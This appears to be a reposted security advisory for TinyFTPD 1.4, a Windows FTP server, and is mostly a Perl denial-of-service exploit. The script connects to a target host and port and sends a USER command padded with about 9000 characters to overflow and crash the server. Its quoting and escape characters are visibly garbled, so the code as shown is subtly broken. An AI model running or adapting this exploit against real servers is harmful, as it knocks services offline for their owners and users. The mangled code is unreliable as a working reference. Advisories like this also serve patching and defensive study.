‘TinyFTPD USER Buffer Overflow DoS (Exploit)’
Summary
‘Tiny FTPd, is a Windows NT family FTP server.
Credit:
‘The original article can be found at: http://www.milw0rm.com/exploits/1758‘
Details
‘Vulnerable Systems:
* TinyFTPD version 1.4
Exploit:
#!/bin/perl
#
# Title: TinyFTPD <= 1.4 USER command D.O.S
# Credits: [Oo]
#
#
use IO::Socket;
print ‘[i] TinyFTPD <= 1.4 USER command D.O.Sn’;
print ‘[i] coded by [Oo]n’;
if (@ARGV < 2)
{
print ‘n[*] Usage: tinyftpd_dos.pl host portn’;
print ‘[*] Exemple: tinyftpd_dos.pl 192.168.0.1 21n’;
exit;
}
$ip = $ARGV[0];
$port = $ARGV[1];
$exploit = ‘(A’ x 9000;
$socket = IO::Socket::INET->new( Proto => ‘tcp’, PeerAddr => ‘$ip’, PeerPort => ‘$port’) || die ‘n[-] Connecting: Failed!n’;
print ‘n[+] Connecting: Ok!n’;
print ‘[+] Sending bad request…n’;
print $socket ‘USER $exploitn’;
sleep(5);
close($socket);
print ‘[?] DoSed?n’;’